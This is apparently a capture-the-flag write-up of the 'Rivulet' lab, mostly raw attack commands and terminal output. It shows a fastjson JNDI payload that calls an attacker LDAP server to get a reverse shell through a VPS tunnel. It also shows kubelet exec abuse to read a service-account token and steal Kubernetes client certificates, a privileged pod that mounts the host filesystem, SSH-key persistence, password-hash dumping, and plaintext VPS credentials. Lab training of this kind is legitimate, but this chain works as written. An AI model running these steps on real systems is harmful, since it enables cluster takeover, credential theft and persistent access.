Rivulet
1. flag01
┌──(root㉿kali)-[~/Desktop/ChunQiu/Rivulet]
└─# fscan -h 8.160.186.13
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[894ms] 已选择服务扫描模式
[894ms] 开始信息扫描
[894ms] 最终有效主机数量: 1
[894ms] 开始主机扫描
[894ms] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[894ms] 有效端口数量: 233
[951ms] [*] 端口开放 8.160.186.13:22
[968ms] [*] 端口开放 8.160.186.13:2379
[994ms] [*] 端口开放 8.160.186.13:8080
[996ms] [*] 端口开放 8.160.186.13:10250
[3.7s] 扫描完成, 发现 4 个开放端口
[3.7s] 存活端口数量: 4
[3.7s] 开始漏洞扫描
[3.7s] POC加载完成: 总共387个,成功387个,失败0个
[3.9s] [*] 网站标题 https://8.160.186.13:10250 状态码:200 长度:104 标题:无标题
[4.1s] [*] 网站标题 http://8.160.186.13:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://8.160.186.13:8080/login;jsessionid=70A614E6D412F0C47A186CBC0F25AF10
[4.3s] [*] 网站标题 http://8.160.186.13:8080/login;jsessionid=70A614E6D412F0C47A186CBC0F25AF10 状态码:400 长度:277 标题:无标题
[4.6s] [*] 网站标题 http://8.160.186.13:8080/login;jsessionid=70A614E6D412F0C47A186CBC0F25AF10 状态码:400 长度:277 标题:无标题
[44.3s] 扫描已完成: 7/7
1.1. shiro 8080
┌──(root㉿kali)-[~/Desktop/ChunQiu/Rivulet]
└─# telnet 8.160.186.13 2379
Trying 8.160.186.13...
Connected to 8.160.186.13.
Escape character is '^]'.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Rivulet]
└─# sshpass -p 'Ubuntu!@#123' ssh -o StrictHostKeyChecking=no -R 0.0.0.0:443:127.0.0.1:4444 root@43.159.45.90 -N

┌──(root㉿kali)-[~/Desktop/ChunQiu/Rivulet]
└─# penelope -p 4444
[+] Listening for reverse shells on 0.0.0.0:4444 -> 127.0.0.1 • 192.168.8.18 • 192.168.88.3 • 172.17.0.1 • 172.19.0.1
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] [New Reverse Shell] => 52a205b59ba8 127.0.0.1 Linux-x86_64 👤 root(0) 😍️ Session ID <1>
[+] Upgrading shell to PTY...
[+] PTY upgrade successful via /usr/bin/python
[+] Interacting with session [1] • PTY • Menu key F12 ⇐
[+] Session log: /root/.penelope/sessions/52a205b59ba8~127.0.0.1-Linux-x86_64/2026_04_24-09_02_34-685.log

root@52a205b59ba8:/app# ls
app.jar
备注:k8s 环境(kubelet 10250)晚上再继续访问。
root@52a205b59ba8:/app# curl -sk 'https://172.17.0.1:10250/run/kube-system/kube-proxy-j874v/kube-proxy' -d 'cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token'
eyJhbGciOiJSUzI1NiIsImtpZCI6InhGbFBSYmlsZlNVb3pGa0JvSThpQ0JnaHgwMTU5dm9zRzMybktUTElyTmsifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJrdWJlLXByb3h5LXRva2VuLWtidzRyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6Imt1YmUtcHJveHkiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIzMmM1MmMwOS1kOGFlLTRjNDctYjBlMS1lMThhZmM2NzVmNDIiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06a3ViZS1wcm94eSJ9.XToOVdoFEQo3Jng3ok2lCfJUdykddleXVDcBjCYr3yeB6CNJcluXYc3joZl7Z5hCepPP3Hhw2quacDWjhd-TJKwJrzBs30lDVvNP1P38_egmy1YEHIE3qjFdA7pa8Qy8ttU6il1jLtH9YONP8FMcip8CMuejeB7doMYTaCaHPv3HM7ch3mO-_EX3MwIl8u2g5FUYPNls72EHiZPgtXlYQnYEmvRX1Le4rJXrJ_17va21VKvD_QJnQ6nDbZuJhiIqnLCmyjb7_olyA2p0FnZDKx6coEwo3iKDZgMCvmC80XGHZu_OuwNoYaLemZJ4tTit96M-T_19TE_79sMJGwneYA
# ========== 1. VPS side: free port 443 by killing whatever still listens on it ==========
# fuser -k targets the *current* listener on 443/tcp instead of a hard-coded,
# stale PID (the old `kill -9 1234008` breaks on every re-run).
sshpass -p 'Ubuntu!@#123' ssh -o StrictHostKeyChecking=no root@43.159.45.90 \
  'fuser -k 443/tcp 2>/dev/null; sleep 1; ss -tlnp | grep -E ":443|:1389|:1099"'
# ========== 2. kali side: clean up zombie ssh -R clients ==========
# Plain TERM first; only report leftovers (escalate to -9 manually if needed).
pkill -f "ssh.*-R.*443:127.0.0.1:4444"; sleep 1
pgrep -af "ssh.*-R.*443" || echo "all clean"
# ========== 3. kali side: rebuild background -R tunnel (VPS 443 -> local 4444) ==========
# ExitOnForwardFailure makes ssh die loudly if 443 is still occupied.
sshpass -p 'Ubuntu!@#123' ssh -o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes \
  -o ServerAliveInterval=30 -fN -R 0.0.0.0:443:127.0.0.1:4444 root@43.159.45.90
# ========== 4. verify the VPS is listening on 443 again ==========
sshpass -p 'Ubuntu!@#123' ssh -o StrictHostKeyChecking=no root@43.159.45.90 'ss -tlnp | grep ":443"'
# ========== 5. start the penelope listener (if not already running) ==========
penelope -p 4444
# ========== 6. trigger fastjson + JNDI payload (run in a new terminal) ==========
# Quoted-delimiter heredoc: the shell performs no expansion, so the JSON
# payload needs no \" escaping (the original python3 -c form was fragile —
# one mis-escaped quote silently corrupts the gadget JSON).
python3 <<'PY'
import requests, time

BASE = 'http://8.160.189.60:8080'
s = requests.Session()
# Authenticate first so the /create endpoint is reachable.
s.post(f'{BASE}/doLogin', data={'username': 'admin', 'password': '123456'},
       allow_redirects=False)

# fastjson JdbcRowSetImpl gadget -> attacker-controlled LDAP server.
url = 'ldap://43.159.45.90:1389/v1qqxf'
p = ('{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
     '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"'
     + url + '","autoCommit":true}}')

t0 = time.time()
r = s.post(f'{BASE}/create', data=p,
           headers={'Content-Type': 'application/json'},
           allow_redirects=False, timeout=30)
print(f'HTTP {r.status_code} ({time.time()-t0:.1f}s)')
PY
# ========== If no shell has arrived yet: diagnostics ==========
VPS='root@43.159.45.90'
VPS_PW='Ubuntu!@#123'
# Inspect the jndi_tool log — did the victim's LDAP request reach us?
sshpass -p "$VPS_PW" ssh -o StrictHostKeyChecking=no "$VPS" 'tail -50 /tmp/jndi_tool.log'
# Any live TCP connections coming from the victim host?
sshpass -p "$VPS_PW" ssh -o StrictHostKeyChecking=no "$VPS" 'ss -tn | grep 8.160.189.60'
在 etcd-web 容器内用 etcdctl 直接 dump etcd,拿 cluster-admin SA token → 用 admin token 创建特权 pod → 挂宿主机 /
- 宿主机 kubelet `10250` **未授权**(允许 `/run/<ns>/<pod>/<container>` 执行命令)
- 容器和宿主机同网段:`172.17.0.1` 是宿主机 docker 网关 = kubelet 监听 IP
- API Server 在 `192.168.1.56:6443`
# Probe kubelet 10250 for unauthenticated API access
curl -sk https://172.17.0.1:10250/pods | head
# Confirm arbitrary command execution (test against the kube-proxy container)
curl -sk https://172.17.0.1:10250/run/kube-system/kube-proxy-j874v/kube-proxy -d 'cmd=id'
# uid=0(root) gid=0(root) groups=0(root)
# Exec endpoint naming: /run/<namespace>/<pod-name>/<container-name>
# (names come from the JSON returned by /pods)
# kube-proxy container (privileged + hostNetwork, but its SA cannot create pods)
K=https://172.17.0.1:10250/run/kube-system/kube-proxy-j874v/kube-proxy
# etcd container (has etcdctl, mounts the etcd client certs)
E=https://172.17.0.1:10250/run/kube-system/etcd-web/etcd
# kube-apiserver container (mounts the full /etc/kubernetes/pki) -- key target
A=https://172.17.0.1:10250/run/kube-system/kube-apiserver-web/kube-apiserver
# Abort if the workdir cannot be entered, so certs never land elsewhere
mkdir -p /tmp/pki && cd /tmp/pki || exit 1
# Confirm the certificates exist
curl -sk "$A" --data-urlencode "cmd=ls /etc/kubernetes/pki/"
# Download the system:masters client-certificate trio
curl -sk "$A" --data-urlencode "cmd=cat /etc/kubernetes/pki/apiserver-kubelet-client.crt" > akc.crt
curl -sk "$A" --data-urlencode "cmd=cat /etc/kubernetes/pki/apiserver-kubelet-client.key" > akc.key
curl -sk "$A" --data-urlencode "cmd=cat /etc/kubernetes/pki/ca.crt" > ca.crt
> 注意:必须用 `--data-urlencode`,否则换行以及 `/` 等特殊字符会被 curl 默认的 `-d` 选项丢弃(换行被吞掉,证书文件损坏)。
# Should return PodList JSON (not Forbidden) -- proves the stolen client cert
# carries system:masters. Run from /tmp/pki where akc.crt/akc.key/ca.crt live.
# URL is quoted: an unquoted '?' could otherwise be glob-expanded by the shell.
curl -s --cert akc.crt --key akc.key --cacert ca.crt \
  "https://192.168.1.56:6443/api/v1/namespaces/default/pods?limit=1" | head -5
# Escape pod spec: privileged + hostNetwork/hostPID/hostIPC, mounts host / at /host.
# Image is one already cached on the node, so no external pull is needed.
cat > /tmp/esc.json << 'JSON'
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": {"name": "sys-mon", "namespace": "default"},
  "spec": {
    "nodeName": "web",
    "hostNetwork": true,
    "hostPID": true,
    "hostIPC": true,
    "containers": [{
      "name": "c",
      "image": "registry.aliyuncs.com/google_containers/kube-proxy:v1.16.5",
      "command": ["sleep", "86400"],
      "securityContext": {"privileged": true},
      "volumeMounts": [{"name": "host", "mountPath": "/host"}]
    }],
    "volumes": [{"name": "host", "hostPath": {"path": "/"}}],
    "tolerations": [{"operator": "Exists"}]
  }
}
JSON
# Create the pod through the API server with the stolen client cert
curl -s --cert akc.crt --key akc.key --cacert ca.crt \
  -H "Content-Type: application/json" -X POST \
  -d @/tmp/esc.json \
  "https://192.168.1.56:6443/api/v1/namespaces/default/pods"
# Exec endpoint of the freshly created escape pod
P=https://172.17.0.1:10250/run/default/sys-mon/c
# Give the pod time to reach Running
sleep 10
curl -sk "$P" --data-urlencode "cmd=id"
# Read arbitrary host files through the /host mount
curl -sk "$P" --data-urlencode "cmd=ls /host/"
curl -sk "$P" --data-urlencode "cmd=cat /host/flag1"
# flag1{1fbfaaf6-4810-4239-b8df-b182b3ea11d2}
curl -sk "$P" --data-urlencode "cmd=cat /host/Notes"
# leaked password: 2835c8c60e654e7a1a8bd2e51059d9b3
# Persistence: append our pubkey to the host root's authorized_keys
curl -sk "$P" --data-urlencode "cmd=sh -c 'mkdir -p /host/root/.ssh && echo YOUR_PUBKEY >> /host/root/.ssh/authorized_keys'"
# Or chroot straight into the host (since /host is the full rootfs)
curl -sk "$P" --data-urlencode "cmd=chroot /host /bin/bash -c 'whoami; hostname'"
root@web:/# cat flag1
flag1{1fbfaaf6-4810-4239-b8df-b182b3ea11d2}
2. flag2
root@web:/# cat /Notes
3.21
Network interface failed to initialize on boot;
- manual reconfiguration applied.
3.18
Docker daemon instability observed;
- service restart restored functionality.
3.16
Kubernetes CNI plugin failure detected;
- pod network connectivity partially degraded.
3.12
Authentication log review completed, no abnormal SSH access confirmed.
3.08
Filesystem mount inconsistency detected;
- remounted affected volume.
3.05
Kernel update applied, temporary network driver mismatch observed post-reboot.
2.28
Firewall rule set revised, unexpected traffic filtering behavior corrected.
2.20
Container runtime performance degradation investigated, memory pressure resolved.
2.10
Scheduled backup verification completed, incremental backup chain validated.
2.2
The default password strength is relatively weak;
- Change the password to a strong one: 2835c8c60e654e7a1a8bd2e51059d9b3
1.25
System-wide package upgrade completed, minor dependency conflicts resolved.
1.10
Initial network configuration audit performed, baseline established.
这个哈希就是 web-123456
root@web:/# ./fscan -h 192.168.1.56/24 -nobr
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.1.56 is alive
(icmp) Target 192.168.1.123 is alive
(icmp) Target 192.168.1.253 is alive
[*] Icmp alive hosts len is: 3
192.168.1.56:10250 open
192.168.1.56:2379 open
192.168.1.123:22 open
192.168.1.56:22 open
192.168.1.123:8000 open
192.168.1.56:8080 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle http://192.168.1.123:8000 code:404 len:22 title:None
[*] WebTitle http://192.168.1.56:8080 code:302 len:0 title:None 跳转url: http://192.168.1.56:8080/login;jsessionid=7C97510616F4793173896536D25A241F
[*] WebTitle https://192.168.1.56:10250 code:404 len:19 title:None
[*] WebTitle http://192.168.1.56:8080/login;jsessionid=7C97510616F4793173896536D25A241F code:400 len:277 title:None
已完成 6/6
[*] 扫描结束,耗时: 6.991040759s
┌──(root㉿kali)-[~/Desktop/ChunQiu/Rivulet]
└─# proxychains -q curl http://192.168.1.123:8000/docs
{"0":{"api":"User Information Query","method":"POST","url":"/api/BasicData","content-type":"application/json","params":{"username":"fuzzy search","workingID":"exact match"},"example":{"request":{"username":"al"},"response":{"status":"success","count":1,"data":[{"username":"alex","phone":"170*****723","email":"zmf7yv90y@company.com","workingID":"503207b4-0e73-41bd-ae30-cd921b6d7f28"}]}}},"1":{"api":"Project Record Query","method":"POST","url":"/api/ProjectRecord","content-type":"application/json","params":{"username":"exact search","grade":"exact match"},"example":{"request":{"grade":"A"},"response":{"status":"success","count":1,"data":[{"employee_name":"jaxon","task":"Brand Refresh","start_date":"2025-11-02","end_date":"2025-04-09","status":"A"}]}}},"2":{"api":"Attendance Record Query","method":"POST","url":"/api/AttendanceRecord","content-type":"application/json","params":{"username":"fuzzy search"},"example":{"request":{"username":"Alice"},"response":{"status":"success","count":1,"data":[{"employee_name":"Alice Johnson","status":"Late","remarks":"Arrived late due to traffic congestion","check_in_time":"2025-01-02 09:10","check_out_time":"2025-01-02 17:45"}]}}},"3":{"api":"Search for Password Hash (Limit 10)","method":"POST","url":"/api/PasswdHash","content-type":"application/json","params":{"username":"fuzzy search"},"example":{"request":{"username":"alex"},"response":{"status":"success","count":1,"data":[{"username":"alex","hash":"c5804b3885b4d5ca57a254a1e06ef72a"}]}}}}
┌──(root㉿kali)-[~/.ssh]
└─# proxychains -q curl -X POST http://192.168.1.123:8000/api/PasswdHash \
> -H 'Content-Type: application/json' -d '{"username":""}'
{"status":"success","count":10,"data":[{"username":"alex","hash":"c5804b3885b4d5ca57a254a1e06ef72a"},{"username":"emma","hash":"f565abb10ff45ef1702c9b1df20ba95e"},{"username":"liam","hash":"1a9f6ffe008cdf8f7e75c1364ad99750"},{"username":"olivia","hash":"5f9585c00f061121f22087ee2bf6ac19"},{"username":"noah","hash":"95c62f9db238479a4746d3fb34ff7ec0"},{"username":"ava","hash":"f4ff96f1a430cd823d2f79a247c1c312"},{"username":"william","hash":"c3e17add574352b67d72b44ab11f42b4"},{"username":"isabella","hash":"c47b85c42650dedfe12f87715829b51a"},{"username":"james","hash":"af8ea5dfcdb3584bf9cec79668a1a089"},{"username":"sophia","hash":"dddd03d20234d69a95f358089562d5a6"}]}
root@web:/# kubectl get nodes -o wide; kubectl get pods -A -o wide; kubectl get svc -A; ip r; docker ps -a
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
web NotReady master 8d v1.16.6-beta.0 192.168.1.56 <none> Ubuntu 18.04.6 LTS 4.15.0-213-generic docker://18.3.1
NAMESPACE NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
default sys-mon 1/1 Running 0 43m 192.168.1.56 web <none> <none>
kube-flannel kube-flannel-ds-7tjnc 1/1 Running 10 8d 192.168.1.56 web <none> <none>
kube-system coredns-58cc8c89f4-msffg 0/1 Pending 0 8d <none> <none> <none> <none>
kube-system coredns-58cc8c89f4-wsbgw 0/1 Pending 0 8d <none> <none> <none> <none>
kube-system etcd-web 1/1 Running 9 8d 192.168.1.56 web <none> <none>
kube-system kube-apiserver-web 1/1 Running 9 8d 192.168.1.56 web <none> <none>
kube-system kube-controller-manager-web 1/1 Running 9 8d 192.168.1.56 web <none> <none>
kube-system kube-proxy-j874v 1/1 Running 5 8d 192.168.1.56 web <none> <none>
kube-system kube-scheduler-web 1/1 Running 10 8d 192.168.1.56 web <none> <none>
NAMESPACE NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
default kubernetes ClusterIP 10.96.0.1 <none> 443/TCP 8d
kube-system kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 8d
default via 192.168.1.253 dev ens5 proto static metric 10
default via 192.168.64.253 dev ens7 proto static metric 20
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1
192.168.1.0/24 dev ens5 proto kernel scope link src 192.168.1.56
192.168.64.0/24 dev ens7 proto kernel scope link src 192.168.64.14
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
5ddcece6b65f 0ee1b8a3ebe0 "sleep 86400" 43 minutes ago Up 43 minutes k8s_c_sys-mon_default_16bc6aa2-9cb2-49c7-830a-d7f66ff7a684_0
e4f96ff18684 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 43 minutes ago Up 43 minutes k8s_POD_sys-mon_default_16bc6aa2-9cb2-49c7-830a-d7f66ff7a684_0
6e39228c20e1 ff281650a721 "/opt/bin/flanneld -…" 2 hours ago Up 2 hours k8s_kube-flannel_kube-flannel-ds-7tjnc_kube-flannel_2ee99dbf-5741-48d2-83b3-666f1789f702_10
607ea51641cd ff281650a721 "/opt/bin/flanneld -…" 2 hours ago Exited (1) 2 hours ago k8s_kube-flannel_kube-flannel-ds-7tjnc_kube-flannel_2ee99dbf-5741-48d2-83b3-666f1789f702_9
870ee0209ee9 0ee1b8a3ebe0 "/usr/local/bin/kube…" 2 hours ago Up 2 hours k8s_kube-proxy_kube-proxy-j874v_kube-system_84ee99bb-d025-4b62-a2dd-44012d40d1e3_5
6a4958f153ce registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 2 hours ago Up 2 hours k8s_POD_kube-flannel-ds-7tjnc_kube-flannel_2ee99dbf-5741-48d2-83b3-666f1789f702_5
d51ef9059c32 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 2 hours ago Up 2 hours k8s_POD_kube-proxy-j874v_kube-system_84ee99bb-d025-4b62-a2dd-44012d40d1e3_5
a3ecd6d9cc92 441835dd2301 "kube-controller-man…" 2 hours ago Up 2 hours k8s_kube-controller-manager_kube-controller-manager-web_kube-system_f50eab22113ed55f640ed65722a1b225_9
8fc970a4a507 b4d073a9efda "kube-scheduler --au…" 2 hours ago Up 2 hours k8s_kube-scheduler_kube-scheduler-web_kube-system_2a528eea0130758e2a9e516b17b74d35_10
d2fdfc8d6bde b2756210eeab "etcd --advertise-cl…" 2 hours ago Up 2 hours k8s_etcd_etcd-web_kube-system_5a5c733754817033fbac18a841a4281f_9
7dd75c768507 fc838b21afbb "kube-apiserver --ad…" 2 hours ago Up 2 hours k8s_kube-apiserver_kube-apiserver-web_kube-system_b269709cbe90ff42cbcdc86d9df1e59c_9
b5be4a8abf14 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 2 hours ago Up 2 hours k8s_POD_kube-controller-manager-web_kube-system_f50eab22113ed55f640ed65722a1b225_8
a8d83b96e20d registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 2 hours ago Up 2 hours k8s_POD_kube-scheduler-web_kube-system_2a528eea0130758e2a9e516b17b74d35_9
49429132157c registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 2 hours ago Up 2 hours k8s_POD_kube-apiserver-web_kube-system_b269709cbe90ff42cbcdc86d9df1e59c_6
646cb1ca38c9 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 2 hours ago Up 2 hours k8s_POD_etcd-web_kube-system_5a5c733754817033fbac18a841a4281f_6
c326f93b4139 0ee1b8a3ebe0 "/usr/local/bin/kube…" 6 days ago Exited (255) Less than a second ago k8s_kube-proxy_kube-proxy-j874v_kube-system_84ee99bb-d025-4b62-a2dd-44012d40d1e3_4
f416c6b49407 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 6 days ago Exited (255) Less than a second ago k8s_POD_kube-proxy-j874v_kube-system_84ee99bb-d025-4b62-a2dd-44012d40d1e3_4
bd6a3baebedc b2756210eeab "etcd --advertise-cl…" 6 days ago Exited (255) Less than a second ago k8s_etcd_etcd-web_kube-system_5a5c733754817033fbac18a841a4281f_8
91466a17b688 fc838b21afbb "kube-apiserver --ad…" 6 days ago Exited (255) Less than a second ago k8s_kube-apiserver_kube-apiserver-web_kube-system_b269709cbe90ff42cbcdc86d9df1e59c_8
69cd8f48ef27 b4d073a9efda "kube-scheduler --au…" 6 days ago Exited (255) Less than a second ago k8s_kube-scheduler_kube-scheduler-web_kube-system_2a528eea0130758e2a9e516b17b74d35_9
4eee9f10e7ec 441835dd2301 "kube-controller-man…" 6 days ago Exited (255) Less than a second ago k8s_kube-controller-manager_kube-controller-manager-web_kube-system_f50eab22113ed55f640ed65722a1b225_8
8b993cee95cc registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 6 days ago Exited (255) Less than a second ago k8s_POD_etcd-web_kube-system_5a5c733754817033fbac18a841a4281f_5
9b055547026e registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 6 days ago Exited (255) Less than a second ago k8s_POD_kube-apiserver-web_kube-system_b269709cbe90ff42cbcdc86d9df1e59c_5
171b5918d0d2 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 6 days ago Exited (255) Less than a second ago k8s_POD_kube-scheduler-web_kube-system_2a528eea0130758e2a9e516b17b74d35_8
5e777a39bb80 registry.aliyuncs.com/google_containers/pause:3.1 "/pause" 6 days ago Exited (255) Less than a second ago k8s_POD_kube-controller-manager-web_kube-system_f50eab22113ed55f640ed65722a1b225_7
52a205b59ba8 shiro-web "java -jar /app/app.…" 2 weeks ago Up Less than a second 0.0.0.0:8080->8080/tcp shiro-web
root@web:/tmp# /fscan -h 192.168.64.0/16 -nobr
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.1.56 is alive
(icmp) Target 192.168.1.253 is alive
(icmp) Target 192.168.1.123 is alive
(icmp) Target 192.168.64.14 is alive
(icmp) Target 192.168.64.253 is alive
[*] LiveTop 192.168.0.0/16 段存活数量为: 5
[*] LiveTop 192.168.1.0/24 段存活数量为: 3
[*] Icmp alive hosts len is: 5
[*] LiveTop 192.168.64.0/24 段存活数量为: 2
192.168.64.14:22 open
192.168.1.56:22 open
192.168.1.123:8000 open
192.168.1.123:22 open
192.168.1.56:8080 open
192.168.64.14:8080 open
192.168.1.56:2379 open
192.168.64.14:10250 open
192.168.1.56:10250 open
[*] alive ports len is: 9
start vulscan
[*] WebTitle http://192.168.1.123:8000 code:404 len:22 title:None
[*] WebTitle http://192.168.1.56:8080 code:302 len:0 title:None 跳转url: http://192.168.1.56:8080/login;jsessionid=C8DF92C25CDD4170CE3172D8C4E5D507
[*] WebTitle http://192.168.64.14:8080 code:302 len:0 title:None 跳转url: http://192.168.64.14:8080/login;jsessionid=A0BFDE255B4F6C35C7FC04FFF9E0BFD2
[*] WebTitle https://192.168.64.14:10250 code:200 len:104 title:None
[*] WebTitle https://192.168.1.56:10250 code:404 len:19 title:None
[*] WebTitle http://192.168.64.14:8080/login;jsessionid=A0BFDE255B4F6C35C7FC04FFF9E0BFD2 code:400 len:277 title:None
[*] WebTitle http://192.168.1.56:8080/login;jsessionid=C8DF92C25CDD4170CE3172D8C4E5D507 code:400 len:277 title:None
已完成 9/9
[*] 扫描结束,耗时: 10.885932953s
root@web:/tmp# ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
inet6 fe80::42:f3ff:fee6:841a prefixlen 64 scopeid 0x20<link>
ether 02:42:f3:e6:84:1a txqueuelen 0 (Ethernet)
RX packets 4255 bytes 434651 (434.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 6894 bytes 7701667 (7.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens5: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.56 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::216:3eff:fe11:738b prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:11:73:8b txqueuelen 1000 (Ethernet)
RX packets 149688 bytes 45796242 (45.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 292846 bytes 38772221 (38.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.64.14 netmask 255.255.255.0 broadcast 192.168.64.255
inet6 fe80::216:3eff:fe11:736f prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:11:73:6f txqueuelen 1000 (Ethernet)
RX packets 2919 bytes 122694 (122.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 37297 bytes 2665034 (2.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
flannel.1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1450
inet 10.244.0.0 netmask 255.255.255.255 broadcast 0.0.0.0
inet6 fe80::f83b:51ff:fe5e:e69d prefixlen 64 scopeid 0x20<link>
ether fa:3b:51:5e:e6:9d txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 16 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 616363 bytes 128801756 (128.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 616363 bytes 128801756 (128.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth867a333: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::145f:d6ff:fee8:dbd5 prefixlen 64 scopeid 0x20<link>
ether 16:5f:d6:e8:db:d5 txqueuelen 0 (Ethernet)
RX packets 4255 bytes 494221 (494.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 6910 bytes 7702883 (7.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
'
root@web:/var/www/html# netstat -lnpt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:10259 0.0.0.0:* LISTEN 2850/kube-scheduler
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 825/systemd-resolve
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1001/sshd
tcp 0 0 127.0.0.1:10248 0.0.0.0:* LISTEN 988/kubelet
tcp 0 0 127.0.0.1:10249 0.0.0.0:* LISTEN 3195/kube-proxy
tcp 0 0 0.0.0.0:10250 0.0.0.0:* LISTEN 1122/nginx: master
tcp 0 0 192.168.1.56:6443 0.0.0.0:* LISTEN 2806/kube-apiserver
tcp 0 0 192.168.1.56:2379 0.0.0.0:* LISTEN 2874/etcd
tcp 0 0 127.0.0.1:2379 0.0.0.0:* LISTEN 2874/etcd
tcp 0 0 192.168.1.56:2380 0.0.0.0:* LISTEN 2874/etcd
tcp 0 0 127.0.0.1:2381 0.0.0.0:* LISTEN 2874/etcd
tcp 0 0 127.0.0.1:10255 0.0.0.0:* LISTEN 988/kubelet
tcp 0 0 127.0.0.1:46575 0.0.0.0:* LISTEN 988/kubelet
tcp 0 0 127.0.0.1:10256 0.0.0.0:* LISTEN 3195/kube-proxy
tcp 0 0 127.0.0.1:10257 0.0.0.0:* LISTEN 2903/kube-controlle
tcp6 0 0 :::22 :::* LISTEN 1001/sshd
tcp6 0 0 :::10251 :::* LISTEN 2850/kube-scheduler
tcp6 0 0 :::10252 :::* LISTEN 2903/kube-controlle
tcp6 0 0 :::8080 :::* LISTEN 1676/docker-proxy
'


